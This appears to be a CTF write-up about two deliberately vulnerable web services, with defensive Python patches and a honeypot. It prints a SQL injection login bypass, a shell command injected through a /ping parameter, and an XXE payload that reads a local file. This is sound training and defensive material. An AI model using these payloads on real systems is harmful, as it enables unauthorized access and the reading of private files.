wu
I wasn't sure if we were allowed to do wu, but I wrote a brief summary for my own records.
tldr;
attack/defense ctf where you were given 2 web services to defend while attacking the other teams' instances of them:
🌟 Mercury Service (Port 8080)
original: vuln.py - login endpoint, flag is in /home/rta_service/flag.txt
vulnerability: sqli bypass + command injection via /ping
exploit: sqli login with admin' OR '1'='1 → authenticated, then ping with command injection, targets /ping?host=127.0.0.1;cat /home/rta_service/flag.txt
patched: added session management, input validation, honeypot traps
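What the Mercury patch looks like in code, as an added example (not the actual vuln.py or its patched version): the string-built login query next to a parameterized one with a token-based session, and a /ping handler that only accepts a literal IP address and never hands user input to a shell. The user table, credentials and the `ping -c 1 -W 2` argv are assumptions for the demo.

```python
import ipaddress
import secrets
import sqlite3
import subprocess
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the service's user table (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")  # constructed credentials
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The string-built query pattern behind the sqli bypass: the quote in
    # admin' OR '1'='1 closes the literal, and AND binds tighter than OR,
    # so the admin row matches whatever the password is.
    query = (f"SELECT 1 FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


SESSIONS: dict[str, str] = {}  # token -> username, the in-memory session store


def login(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Hardened login: placeholders keep user input out of the SQL grammar,
    and success is represented by a random session token, not a query result."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    if row is None:
        return None
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = username
    return token


def build_ping_command(host: str) -> list[str]:
    """Accept only a literal IPv4/IPv6 address and build argv for ping.
    ipaddress rejects ';', '|', '$(' and anything else that is not an address,
    and a list argv means no shell ever interprets the value."""
    addr = ipaddress.ip_address(host.strip())  # ValueError on anything but an address
    return ["ping", "-c", "1", "-W", "2", str(addr)]


def ping_handler(token: str, host: str) -> tuple[int, str]:
    """Session check first, then strict input validation, then the command."""
    if token not in SESSIONS:
        return 401, "login required"
    try:
        argv = build_ping_command(host)
    except ValueError:
        return 400, "host must be a plain IPv4/IPv6 address"
    return 200, " ".join(argv)


def run_ping(argv: list[str]) -> str:
    """Only ever called with argv from build_ping_command; no shell=True."""
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return result.stdout
```

Note that `ping_handler` returns the argv it would run rather than running it, so the validation can be exercised without network access; in the service the 200 path would call `run_ping(argv)` and return its stdout.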
🌟 Mars Service (Port 8080)
original: app.py - unsafe xml parser with resolve_entities=True
vulnerability: xxe (xml external entity) injection via file upload
exploit: upload malicious xml to read sensitive files
poc.xml:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///home/rta_service/flag.txt"> ]>
<root> <item>&xxe;</item> </root>
patched: disabled external entities, added input validation
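The Mars patch plus the honeypot, as an added example (not the real app.py): uploads are screened for DOCTYPE/ENTITY declarations on the raw bytes before any parser touches them, a hit is logged in the same shape as the log lines further down and answered with a decoy flag, clean documents go through the stdlib expat parser, and a small helper counts hits per source IP from such log lines. The decoy flag value, the in-memory log list and the sample documents are constructed for the demo.

```python
import re
import xml.etree.ElementTree as ET
from collections import Counter
from datetime import datetime, timezone

# The upload endpoint never needs a DTD, so any DOCTYPE or ENTITY declaration
# is treated as an attack signal and trips the honeypot.
DTD_MARKERS = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

FAKE_FLAG = "flag{decoy_not_the_real_flag}"  # constructed decoy served to honeypot hits
HONEYPOT_LOG: list[str] = []                 # stands in for the service's log file

LOG_LINE = re.compile(r"ip=(?P<ip>\S+) event=HONEYPOT_HIT ")


def honeypot_log(client_ip: str, reason: str) -> str:
    """Append a line in the same shape as the service's honeypot log and return it."""
    ts = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
    line = f"[{ts}] ip={client_ip} event=HONEYPOT_HIT details=reason={reason}"
    HONEYPOT_LOG.append(line)
    return line


def inspect_upload(data: bytes, client_ip: str):
    """Return (accepted, result): the parsed (tag, text) items on success, a
    reason string or the decoy flag on rejection. The DTD check runs on the raw
    bytes first, so no entity is ever declared, let alone resolved."""
    if DTD_MARKERS.search(data):
        honeypot_log(client_ip, "doctype/entity detected")
        return False, FAKE_FLAG
    try:
        # stdlib expat parser: no network access and no external entity fetching.
        # For an lxml-based service the equivalent fix is
        # etree.XMLParser(resolve_entities=False, no_network=True).
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, f"malformed xml: {exc}"
    return True, [(child.tag, (child.text or "").strip()) for child in root]


def summarize_hits(lines) -> Counter:
    """Count HONEYPOT_HIT lines per source ip, e.g. to decide what to block."""
    hits: Counter = Counter()
    for line in lines:
        match = LOG_LINE.search(line)
        if match:
            hits[match.group("ip")] += 1
    return hits
```

The screening is deliberately coarse: a benign upload that happens to carry a DOCTYPE is trapped too, which is acceptable for a CTF service where no legitimate client sends one, but would need a narrower rule (or a whitelist of known DTDs) on a real endpoint.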
please don't do this at home.
leave a honeypot and a fake flag up since I know they are automated to hit my services. Now I have a bunch of IPs 🥀, please use a VPN
...
[2025-09-28 03:00:07] ip=[REDACTED] event=HONEYPOT_HIT details=reason=doctype/entity detected
[2025-09-28 03:00:16] ip=[REDACTED] event=HONEYPOT_HIT details=reason=doctype/entity detected
[2025-09-28 03:00:18] ip=[REDACTED] event=HONEYPOT_HIT details=reason=doctype/entity detected
...